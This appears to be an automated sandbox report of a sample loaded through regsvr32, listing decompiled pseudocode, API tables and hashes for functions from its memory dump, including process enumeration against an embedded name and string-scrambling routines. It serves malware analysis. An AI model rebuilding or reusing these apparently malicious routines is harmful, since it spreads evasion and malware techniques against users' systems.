                                0x00000000
                                0x02bd2b65
                                0x02bd2a81
                                0x02bd2a88
                                0x02bd2a8c
                                0x02bd2a92
                                0x02bd2a94
                                0x02bd2a96
                                0x02bd2a98
                                0x02bd2a9a
                                0x02bd2aa4
                                0x02bd2aa9
                                0x02bd2aab
                                0x02bd2aad
                                0x02bd2aae
                                0x02bd2aaf
                                0x02bd2ab0
                                0x02bd2ab7
                                0x02bd2abe
                                0x02bd2ac1
                                0x02bd2ac1
                                0x02bd2a8e
                                0x02bd2a8e
                                0x02bd2a8e
                                0x02bd2ac9
                                0x02bd2ad1
                                0x02bd2ada
                                0x02bd2adf
                                0x02bd2adf
                                0x02bd2ae4
                                0x00000000
                                0x00000000
                                0x02bd2ae6
                                0x02bd2ae9
                                0x02bd2af3
                                0x00000000
                                0x00000000
                                0x02bd2af5
                                0x02bd2af5
                                0x02bd2aff
                                0x02bd2adf
                                0x02bd2ae4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd2ae4
                                0x02bd2b09
                                0x02bd2b0c
                                0x02bd2b0f
                                0x02bd2b16
                                0x02bd2b16
                                0x02bd2b23
                                0x00000000
                                0x02bd2b23
                                0x02bd2a1e
                                0x02bd2a22
                                0x02bd2a23
                                0x02bd2a25
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd2a25
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BD2A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BD2AB0
                                • memset.NTDLL ref: 02BD2B50
                                • memset.NTDLL ref: 02BD2B60
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 690beb1f2ae0e6ed00e808ae2797449b466d0e0bc1da0a18198c49e84d3fcfd5
                                • Instruction ID: 5f33ca7fdd2f3d44fb2f78e709e9c4d5e50566e7d90fe024ac01934b481880ce
                                • Opcode Fuzzy Hash: 690beb1f2ae0e6ed00e808ae2797449b466d0e0bc1da0a18198c49e84d3fcfd5
                                • Instruction Fuzzy Hash: 56418172A00249ABDB20DFA8CC80BDE7776EF45710F0085A9FD19AB181FB709945CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD6150, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E02BD6150(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2bdd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2bdd2a8; // 0x242a5a8
				_t3 = _t8 + 0x2bde87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E02BD10B1(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2bdd2ac, 1, 0, _t30);
					E02BD8B22(_t30);
				}
				_t12 =  *0x2bdd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BD8F1B() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02BD3485(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2bdd10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02BD8B7B(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                0x02bd6151
                                0x02bd6158
                                0x02bd6162
                                0x02bd6166
                                0x02bd616c
                                0x02bd617b
                                0x02bd6182
                                0x02bd6186
                                0x02bd6198
                                0x02bd619a
                                0x02bd619a
                                0x02bd619f
                                0x02bd61a6
                                0x02bd61fd
                                0x02bd61fd
                                0x02bd6203
                                0x02bd6205
                                0x02bd6205
                                0x02bd620f
                                0x02bd6213
                                0x02bd6225
                                0x02bd6225
                                0x02bd6229
                                0x02bd622f
                                0x02bd622f
                                0x00000000
                                0x02bd61bf
                                0x02bd61c4
                                0x02bd61cc
                                0x02bd61d0
                                0x02bd61d4
                                0x02bd61d4
                                0x02bd61e1
                                0x02bd61e5
                                0x02bd61e9
                                0x02bd623e
                                0x02bd6244
                                0x02bd6244
                                0x02bd61f7
                                0x02bd61fb
                                0x02bd6232
                                0x02bd6234
                                0x02bd6237
                                0x02bd6237
                                0x00000000
                                0x02bd6234
                                0x02bd61fb
                                0x00000000
                                0x02bd61e5

                                APIs
                                  • Part of subcall function 02BD10B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05009D18,00000000,?,?,69B25F44,00000005,02BDD00C,?,?,02BD30FE), ref: 02BD10E7
                                  • Part of subcall function 02BD10B1: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD110B
                                  • Part of subcall function 02BD10B1: lstrcat.KERNEL32(00000000,00000000), ref: 02BD1113
                                • CreateEventA.KERNEL32(02BDD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD991F,?,00000001,?), ref: 02BD6191
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,02BD991F,00000000,00000000,?,00000000,?,02BD991F,?,00000001,?,?,?,?,02BD7D37), ref: 02BD61F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD991F,?,00000001,?), ref: 02BD621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD991F,?,00000001,?,?,?,?,02BD7D37), ref: 02BD6237
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: defec4b652b592f38240f021f7544f96df8f4924d3e830c9efc28b71ef2aaa51
                                • Instruction ID: 9548e548039a2109efdbe4b3f737c1a9a3d24b5f0dea941a6c663efe08fc0120
                                • Opcode Fuzzy Hash: defec4b652b592f38240f021f7544f96df8f4924d3e830c9efc28b71ef2aaa51
                                • Instruction Fuzzy Hash: 04213733D427125BC7315E68AC44BEBB7ADEF88B55B050AA9F985D7141FB31CC458B40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD9870, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E02BD9870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02BD2931(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02BD8DAB(_t23);
						}
					}
					return _t38;
				}
				if(E02BD155A(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2bdd2ac, 1, 0,  *0x2bdd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02BD5BC0(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02BD4B2A(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02BD4FF0(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02BD6150( &_v32, _t39);
					goto L13;
				}
			}












                                0x02bd9870
                                0x02bd987d
                                0x02bd9883
                                0x02bd9884
                                0x02bd9885
                                0x02bd9886
                                0x02bd9887
                                0x02bd988b
                                0x02bd9897
                                0x02bd989b
                                0x02bd9923
                                0x02bd9923
                                0x02bd9926
                                0x02bd9928
                                0x02bd9930
                                0x02bd9930
                                0x02bd9936
                                0x02bd9939
                                0x02bd9939
                                0x02bd9936
                                0x02bd9944
                                0x02bd9944
                                0x02bd98ae
                                0x02bd98b0
                                0x02bd98b0
                                0x02bd98c7
                                0x02bd98cb
                                0x02bd98ce
                                0x02bd98d9
                                0x02bd98e0
                                0x02bd98e0
                                0x02bd98e9
                                0x02bd98ed
                                0x02bd98fb
                                0x02bd98ef
                                0x02bd98ef
                                0x02bd98f0
                                0x02bd98f1
                                0x02bd98f2
                                0x02bd98f3
                                0x02bd98f4
                                0x02bd98f4
                                0x02bd9900
                                0x02bd9903
                                0x02bd9907
                                0x02bd9909
                                0x02bd9909
                                0x02bd9910
                                0x00000000
                                0x02bd9912
                                0x02bd9912
                                0x02bd991f
                                0x00000000
                                0x02bd991f

                                APIs
                                • CreateEventA.KERNEL32(02BDD2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,02BD7D37,?,00000001,?), ref: 02BD98C1
                                • SetEvent.KERNEL32(00000000,?,?,?,02BD7D37,?,00000001,?,00000002,?,?,02BD312C,?), ref: 02BD98CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,02BD7D37,?,00000001,?,00000002,?,?,02BD312C,?), ref: 02BD98D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,02BD7D37,?,00000001,?,00000002,?,?,02BD312C,?), ref: 02BD98E0
                                  • Part of subcall function 02BD5BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BD9900,?,02BD9900,?,?,?,?,?,02BD9900,?), ref: 02BD5C9A
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: 1713b645e3369d20635cafa85a504817c28da834021a0626769793e42171b553
                                • Instruction ID: 0080c6b1ba8bcdc0199ab45cf1fb3899358e33d7c9608335ef29d151c3cf1d48
                                • Opcode Fuzzy Hash: 1713b645e3369d20635cafa85a504817c28da834021a0626769793e42171b553
                                • Instruction Fuzzy Hash: E921C673D00619ABDB20AFE4C8849EEB7BDEF44354B4144A6EB55E7100F7789945CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD5F58, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 78%
                                			E02BD5F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02BD1525(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                0x02bd5f64
                                0x02bd5f68
                                0x02bd5f69
                                0x02bd5f6a
                                0x02bd5f6c
                                0x02bd5f6e
                                0x02bd5f71
                                0x02bd5f76
                                0x02bd600d
                                0x02bd6014
                                0x02bd6014
                                0x02bd5f7f
                                0x02bd5f86
                                0x02bd5f96
                                0x02bd5f96
                                0x02bd5f9c
                                0x02bd5f9e
                                0x02bd5fa3
                                0x02bd5fac
                                0x02bd5fb2
                                0x02bd5fb7
                                0x02bd5fc2
                                0x02bd5fc6
                                0x02bd5fc8
                                0x02bd5fc9
                                0x02bd5fd2
                                0x02bd5fd6
                                0x02bd5fe7
                                0x02bd5fd8
                                0x02bd5fdd
                                0x02bd5fe2
                                0x02bd5ff1
                                0x02bd5ff1
                                0x02bd5fc6
                                0x02bd5ff7
                                0x02bd5ffd
                                0x02bd5ffd
                                0x02bd6006
                                0x02bd600b
                                0x02bd600b
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 2cca96a70e27d1bd0628d74122335ca2bcf11beb59b5ed36c6b4018728ee1ae7
                                • Instruction ID: 51be1459eaf107ebf69e7ff385fe0f4e48266677b617b5f5fd167b73bdc87b71
                                • Opcode Fuzzy Hash: 2cca96a70e27d1bd0628d74122335ca2bcf11beb59b5ed36c6b4018728ee1ae7
                                • Instruction Fuzzy Hash: 21214F7590120AEFCB11DFA8D8949DEBBB9FF48344B1081A9E946E7200FB30DA44CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BDA41C, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E02BDA41C(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2bdd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2bdd250; // 0xa58ef514
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2bdd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                0x02bda424
                                0x02bda427
                                0x02bda42d
                                0x02bda445
                                0x02bda447
                                0x02bda44c
                                0x02bda44e
                                0x02bda451
                                0x02bda453
                                0x02bda456
                                0x02bda458
                                0x02bda458
                                0x02bda45a
                                0x02bda465
                                0x02bda46a
                                0x02bda47b
                                0x02bda483
                                0x02bda488
                                0x02bda48b
                                0x02bda48e
                                0x02bda490
                                0x02bda493
                                0x02bda496
                                0x02bda496
                                0x02bda499
                                0x02bda4a4
                                0x02bda4a9
                                0x02bda4b3

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD7C20,00000000,?,?,02BD9DA0,?,050095B0), ref: 02BDA427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BDA43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02BD7C20,00000000,?,?,02BD9DA0,?,050095B0), ref: 02BDA483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 02BDA4A4
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 9409027820e9504ef47263256c0b863c478f52c82a913cf32a895e68c27d5438
                                • Instruction ID: 0cf9b5c4788c3dfaa00f7589c68a1ad9aa97d4c71d1a1271a7d73934cf345d16
                                • Opcode Fuzzy Hash: 9409027820e9504ef47263256c0b863c478f52c82a913cf32a895e68c27d5438
                                • Instruction Fuzzy Hash: 2D11E972A41115AFC7108AA9DC98EDEBFAEDBC43A1B0902B6F944D7140F770AE14CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8F1B, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E02BD8F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2bdd2a8; // 0x242a5a8
						_t2 = _t9 + 0x2bdee34; // 0x73617661
						_push( &_v264);
						if( *0x2bdd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x02bd8f26
                                0x02bd8f30
                                0x02bd8f34
                                0x02bd8f3e
                                0x02bd8f6f
                                0x02bd8f45
                                0x02bd8f4a
                                0x02bd8f57
                                0x02bd8f60
                                0x02bd8f77
                                0x02bd8f62
                                0x02bd8f6a
                                0x00000000
                                0x02bd8f6a
                                0x02bd8f78
                                0x02bd8f79
                                0x00000000
                                0x02bd8f79
                                0x00000000
                                0x02bd8f73
                                0x02bd8f7f
                                0x02bd8f84

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD8F2B
                                • Process32First.KERNEL32(00000000,?), ref: 02BD8F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 02BD8F6A
                                • CloseHandle.KERNEL32(00000000), ref: 02BD8F79
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 62c6459fe67a7cdc770e285368e9d64a8c0d55bda4ccf07138b3d88877f1c66b
                                • Instruction ID: a2f7d91e59c8df877088b5543b708bc2a0e077b141607646790addc47475f8a0
                                • Opcode Fuzzy Hash: 62c6459fe67a7cdc770e285368e9d64a8c0d55bda4ccf07138b3d88877f1c66b
                                • Instruction Fuzzy Hash: DCF0BB325011256BD720B6369C49EEFB76EDBC5751F4105D1E945D3000F730DA96CAA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD8C01, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD8C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                0x02bd8c0b
                                0x02bd8c0f
                                0x02bd8c24
                                0x02bd8c26
                                0x02bd8c2b
                                0x02bd8c31
                                0x02bd8c33
                                0x02bd8c38
                                0x02bd8c43
                                0x02bd8c3a
                                0x02bd8c3a
                                0x02bd8c3a
                                0x02bd8c38
                                0x02bd8c51

                                APIs
                                • memset.NTDLL ref: 02BD8C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 02BD8C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02BD8C31
                                • CloseHandle.KERNEL32(?), ref: 02BD8C43
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 8faa5951361c736fce72da777a23dd49d9294387ecbebd9840fbc2429f64cf7f
                                • Instruction ID: 78687e93f6e85cc3ea516d86837c26bbca912666eaa00f5e8272a56bbcd3b21d
                                • Opcode Fuzzy Hash: 8faa5951361c736fce72da777a23dd49d9294387ecbebd9840fbc2429f64cf7f
                                • Instruction Fuzzy Hash: B7F0E2F150630DBFD3106F26DCC0C6BBBACEB4119EB114E6EF046C2110E632A8498AA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD4DB1, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD4DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2bdd26c; // 0x2b8
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2bdd2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2bdd26c; // 0x2b8
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2bdd238; // 0x4c10000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x02bd4db1
                                0x02bd4db8
                                0x02bd4e02
                                0x02bd4e04
                                0x02bd4e04
                                0x02bd4dbc
                                0x02bd4dc2
                                0x02bd4dc7
                                0x02bd4dcb
                                0x02bd4dd1
                                0x02bd4dd8
                                0x00000000
                                0x00000000
                                0x02bd4dda
                                0x02bd4ddf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02bd4ddf
                                0x02bd4de1
                                0x02bd4de9
                                0x02bd4dec
                                0x02bd4dec
                                0x02bd4df2
                                0x02bd4df9
                                0x02bd4dfc
                                0x02bd4dfc
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002B8,00000001,02BD7F41), ref: 02BD4DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 02BD4DCB
                                • CloseHandle.KERNEL32(000002B8), ref: 02BD4DEC
                                • HeapDestroy.KERNEL32(04C10000), ref: 02BD4DFC
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 70a6496b090ea9d2dff4bfc8e78c0f6807d6821eaa7f70a1133f50e576f2031b
                                • Instruction ID: 8146423066380f3f9f64bcdaac8c4c92cc487b37cd27e4f654b8d5a878cabbfc
                                • Opcode Fuzzy Hash: 70a6496b090ea9d2dff4bfc8e78c0f6807d6821eaa7f70a1133f50e576f2031b
                                • Instruction Fuzzy Hash: 48F01C76E833129BDA206A75DD58BC73AA8EB047E1B454A54B950D7284FB70CC50D660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD5B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E02BD5B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E02BD7B3B(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E02BD2D2E(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E02BDA38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x2bdd238, 0, _t25);
				}
				return _t22;
			}










                                0x02bd5b05
                                0x02bd5b16
                                0x02bd5b1a
                                0x02bd5b75
                                0x02bd5b1c
                                0x02bd5b23
                                0x02bd5b2b
                                0x02bd5b33
                                0x02bd5b37
